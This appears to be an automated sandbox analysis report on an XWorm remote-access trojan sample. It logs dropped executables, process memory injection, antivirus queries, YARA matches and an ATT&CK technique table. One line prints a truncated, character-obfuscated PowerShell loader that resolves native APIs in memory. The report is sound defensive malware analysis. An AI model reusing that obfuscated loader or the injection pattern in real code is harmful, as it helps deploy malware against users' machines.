                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 620000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2640000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2600000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1590000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2F90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 890000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3020000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 5F0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25F0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 800000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: C00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2CA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2870000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2BB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F50000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 11D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1170000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 10A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1420000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 13E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: ED0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1220000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B80000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: DC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1020000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 28C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 23F0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DFB160000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE470000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE4A0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5360000Jump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe" Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:rlleiafhazae{param([outputtype([type])][parameter(position=0)][type[]]$osygfxruyuiqnc,[parameter(position=1)][type]$mbvadjewai)$relcklizwns=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+[char](100)+''+'d'+'e'+[char](108)+''+'e'+''+[char](103)+'a'+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+'e'+[char](109)+''+[char](111)+''+[char](114)+'y'+'m'+'o'+[char](100)+''+[char](117)+'l'+'e'+'',$false).definetype('my'+'d'+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'ate'+[char](84)+''+'y'+'p'+[char](101)+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+'s'+','+''+[char](80)+''+'u'+'bl'+'i'+''+[char](99)+''+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+''+[char](101)+''+'d'+','+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+[char](67)+'la'+[char](115)+''+'s'+','+[char](65)+''+'u'+''+[char](116)+''+'o'+''+[char](67)+''+[char](108)+'a'+[char](115)+'s',[multicastdelegate]);$relcklizwns.defineconstructor(''+[char](82)+''+'t'+'s'+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+''+[char](97)+'l'+[char](78)+''+'a'+''+[char](109)+'e'+[char](44)+''+[char](72)+''+'i'+'debys'+'i'+''+'g'+''+[char](44)+''+'p'+''+'u'+''+'b'+''+'l'+''+[char](105)+'c',[reflection.callingconventions]::standard,$osygfxruyuiqnc).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+',m'+[char](97)+''+'n'+''+[char](97)+''+'g'+''+'e'+''+'d'+'');$relcklizwns.definemethod(''+[char](73)+''+[char](110)+'v'+'o'+''+'k'+''+[char](101)+'',''+[char](80)+''+'u'+'b'+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+'deb'+'y'+''+'s'+'i'+[char](103)+','+'n'+'ew'+[char](83)+''+[char](108)+'o'+[char](116)+''+','+'vi'+[char](114)+'t'+[char](117)+''+[char](97)+''+'l'+'',$mbvadjewai,$osygfxruyuiqnc).setimplementationflags(''+'r'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[char](44)+''+'m'+''+[char](97)+''+'n'+''+[char](97)+'g'+[char](101)+''+'d'+'');write-output $relcklizwns.createtype();}$ggvrsjgyyzyvf=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sy'+[char](115)+''+[char](116)+''+'e'+'m.'+[char](100)+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t.wi'+[char](110)+'32.'+'u'+''+[char](110)+''+'s'+'a'+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+''+'m'+'eth'+'o'+''+[char](100)+''+'s'+'');$vrbfksfcqktmpl=$ggvrsjgyyzyvf.getmethod(''+'g'+''+[char](101)+'tpr'+[char](111)+''+[char](99)+''+[char](65)+''+[char](100)+'d'+[char](114)+''+[char](101)+'s'+'s'+''
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,5_2_0000000140002300
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,1_2_00788550
                      Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2y
                      Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_3_000002D8B0A44040 cpuid 5_3_000002D8B0A44040
                      Source: C:\Users\user\Desktop\x433.exeQueries volume information: C:\Users\user\Desktop\x433.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x4host.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\x4usb.exeQueries volume information: C:\Users\user\AppData\Local\x4usb.exe VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,5_2_0000000140002300
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A67D50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_000002D8B0A67D50
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,1_2_00788550
                      Source: C:\Users\user\Desktop\x433.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x4host.exe, 00000002.00000002.2937932560.0000000001407000.00000004.00000020.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.3000681433.000000001C0D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.16.drBinary or memory string: MsMpEng.exe
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x433.exe PID: 6576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x4host.exe PID: 6860, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x433.exe PID: 6576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x4host.exe PID: 6860, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      Credential API Hooking
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      11
                      Deobfuscate/Decode Files or Information
